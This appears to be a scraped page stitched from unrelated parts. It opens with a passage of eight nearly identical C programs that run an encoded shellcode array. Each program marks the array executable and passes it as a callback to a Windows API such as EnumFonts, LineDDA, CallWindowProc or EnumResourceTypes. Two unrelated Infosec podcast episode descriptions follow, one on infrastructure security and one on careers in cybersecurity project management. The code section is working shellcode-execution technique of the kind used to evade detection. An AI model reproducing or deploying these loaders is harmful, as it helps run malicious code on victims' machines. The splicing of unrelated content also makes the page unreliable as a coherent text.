By checking the references, we can see that other APIs also use the EnumWindowsWorker function, making them suitable candidates for executing shellcode.

EnumFonts

#include <Windows.h>
/*
 * https://osandamalith.com - @OsandaMalith
 */
int main() {
	int shellcode[] = {
		015024551061,014333060543,012124454524,06034505544,
		021303073213,021353206166,03037505460,021317057613,
		021336017534,0110017564,03725105776,05455607444,
		025520441027,012701636201,016521267151,03735105760,
		0377400434,032777727074
	};
	DWORD oldProtect = 0;
	BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect);
	
	EnumFonts(GetDC(0), (LPCWSTR)0, (FONTENUMPROC)(char *)shellcode, 0);
}

EnumFontFamilies

#include <Windows.h>
/*
 * https://osandamalith.com - @OsandaMalith
 */
int main() {
	int shellcode[] = {
		015024551061,014333060543,012124454524,06034505544,
		021303073213,021353206166,03037505460,021317057613,
		021336017534,0110017564,03725105776,05455607444,
		025520441027,012701636201,016521267151,03735105760,
		0377400434,032777727074
	};
	DWORD oldProtect = 0;
	BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect);
	
	EnumFontFamilies(GetDC(0), (LPCWSTR)0, (FONTENUMPROC)(char *)shellcode,0);
}

EnumFontFamiliesEx

#include <Windows.h>
/*
 * https://osandamalith.com - @OsandaMalith
 */
int main() {
	int shellcode[] = {
		015024551061,014333060543,012124454524,06034505544,
		021303073213,021353206166,03037505460,021317057613,
		021336017534,0110017564,03725105776,05455607444,
		025520441027,012701636201,016521267151,03735105760,
		0377400434,032777727074
	};
	DWORD oldProtect = 0;
	BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect);
	
	EnumFontFamiliesEx(GetDC(0), 0, (FONTENUMPROC)(char *)shellcode, 0, 0);
}

EnumDisplayMonitors

#include <Windows.h>
/*
 * https://osandamalith.com - @OsandaMalith
 */
int main() {
	int shellcode[] = {
		015024551061,014333060543,012124454524,06034505544,
		021303073213,021353206166,03037505460,021317057613,
		021336017534,0110017564,03725105776,05455607444,
		025520441027,012701636201,016521267151,03735105760,
		0377400434,032777727074
	};
	DWORD oldProtect = 0;
	BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect);
	
	EnumDisplayMonitors((HDC)0,(LPCRECT)0,(MONITORENUMPROC)(char *)shellcode,(LPARAM)0);
}

LineDDA

#include <Windows.h>
/*
 * https://osandamalith.com - @OsandaMalith
 */
int main() {
	int shellcode[] = {
		015024551061,014333060543,012124454524,06034505544,
		021303073213,021353206166,03037505460,021317057613,
		021336017534,0110017564,03725105776,05455607444,
		025520441027,012701636201,016521267151,03735105760,
		0377400434,032777727074
	};
	DWORD oldProtect = 0;
	BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect);
	
	LineDDA(10, 11, 12, 14, (LINEDDAPROC)(char *)shellcode, 0);
}

GrayString

#include <Windows.h>
/*
 * https://osandamalith.com - @OsandaMalith
 */
int main() {
	int shellcode[] = {
		015024551061,014333060543,012124454524,06034505544,
		021303073213,021353206166,03037505460,021317057613,
		021336017534,0110017564,03725105776,05455607444,
		025520441027,012701636201,016521267151,03735105760,
		0377400434,032777727074
	};
	DWORD oldProtect = 0;
	BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect);
	
	GrayString(0, 0, (GRAYSTRINGPROC)(char *)shellcode, 1, 2, 3, 4, 5, 6);
}

CallWindowProc

#include <Windows.h>
/*
 * https://osandamalith.com - @OsandaMalith
 */
int main() {
	int shellcode[] = {
		015024551061,014333060543,012124454524,06034505544,
		021303073213,021353206166,03037505460,021317057613,
		021336017534,0110017564,03725105776,05455607444,
		025520441027,012701636201,016521267151,03735105760,
		0377400434,032777727074
	};
	DWORD oldProtect = 0;
	BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect);
	
	CallWindowProc((WNDPROC)(char *)shellcode, (HWND)0, 0, 0, 0);
}

EnumResourceTypes

#include <Windows.h>
/*
 * https://osandamalith.com - @OsandaMalith
 */
int main() {
	int shellcode[] = {
		015024551061,014333060543,012124454524,06034505544,
		021303073213,021353206166,03037505460,021317057613,
		021336017534,0110017564,03725105776,05455607444,
		025520441027,012701636201,016521267151,03735105760,
		0377400434,032777727074
	};
	DWORD oldProtect = 0;
	BOOL ret = VirtualProtect((LPVOID)shellcode, sizeof shellcode, PAGE_EXECUTE_READWRITE, &oldProtect);
	
	EnumResourceTypes(0, (ENUMRESTYPEPROC)(char *)shellcode, 0);
}

You can check out this repo by my friends @bofheaded & @0xhex21 for other callback APIs.

Defending the grid: From water supply hacks to nation-state attacks | Guest Emily Miller

This episode we welcome back Emily Miller of Mocana to discuss infrastructure security! We discuss the water supply hack in Oldsmar, Fla., the state of the nation’s cybersecurity infrastructure and brainstorm a TikTok musical that will make infrastructure security the next Hamilton! 

0:00 - Intro
3:02 - The last two years
5:54 - The impact of COVID
10:10 - The Florida hack
15:50 - Scope and scale of safety systems
18:50 - State and local government responses
23:20 - Logistical issues of security for infrastructure
26:45 - Ideal solutions to security 
31:33 - How to improve infrastructure security
39:42 - Aiming toward state and local government 
43:20 - Skills to learn for this work
48:13 - Future proofing this role
52:54 - Work and upcoming projects
55:55 - Outro

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

Miller is the Vice President of Critical Infrastructure and National Security with Mocana Corporation. Miller has over 15 years of experience protecting our nation’s critical infrastructure in both physical and cybersecurity, focusing on control systems, industrial IoT and other operational technology. Prior to joining Mocana, Miller was a federal employee with the Department of Homeland Security’s Industrial Control Systems Cyber Emergency Response Team (ICS-CERT).  

On our previous episode back in early 2019, Miller and I talked about IoT security and infrastructure security, and how strengthening IoT and the security systems of our electrical, water and internet infrastructures isn’t just good business, it’s saving lives.

In the last two years, these issues have become even more pronounced. Earlier this year, hackers broke into the network of a water purification system in a small town in Florida. By changing cleaning and purification levels in the town's water supply, they could realistically have poisoned the whole town. Miller and I will be discussing not only how to address the problems we have now, but also how to help the new generation of cybersecurity professionals lead the charge to reverse a 50+ year trend of neglect against our country's vital infrastructure, from power grids to roads.

About Infosec

Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.


How to become a cybersecurity project manager | Guest Jackie Olshack

This episode we chat with Jackie Olshack, a project management professional, about the role of project management in cybersecurity. We break down the specific functions of some major project management certifications, discuss things you can do tonight to start your project management training and hear why every security breach story on CNN is a cause for reflection.

0:00 - Intro
3:09 - Getting into cybersecurity project management
4:30 - What does a cybersecurity project manager do?
5:56 - Identity access management
8:35 - Average day for a project manager
9:57 - Managing project resources
11:36 - Getting into project management
12:54 - What happens without a project manager?
14:30 - Highs and lows of the job
17:22 - Training needed for the role
20:18 - What is identity access management?
24:12 - Preferred job experiences
28:02 - Interests and skills to succeed
31:17 - Where do I begin with tech lingo?
33:18 - What can I do to change careers?
35:00 - Has remote work changed workflow?
35:55 - Outro


Jackie Olshack worked almost 20 years as a legal secretary/paralegal for multiple patent corporate law firms. In the late 1990s, she began to recognize it was becoming harder to break the ceiling on her $58,000 salary as more and more attorneys were typing their own documents, managing their own calendars and making their own travel arrangements, putting the future of her career in jeopardy. After some introspection, she decided to go back to college and pursue a science degree with plans to go to law school and become a patent attorney, but she couldn’t get her LSAT score high enough to get into even a fourth-tier law school. She now proudly thanks all the law schools that turned her down, sparing her the dreaded $150,000-$200,000 law school debt she would have incurred. She is now an analytical, top-performing, SAFe-trained senior project management professional with 14+ years of experience successfully managing and implementing IT programs and projects.

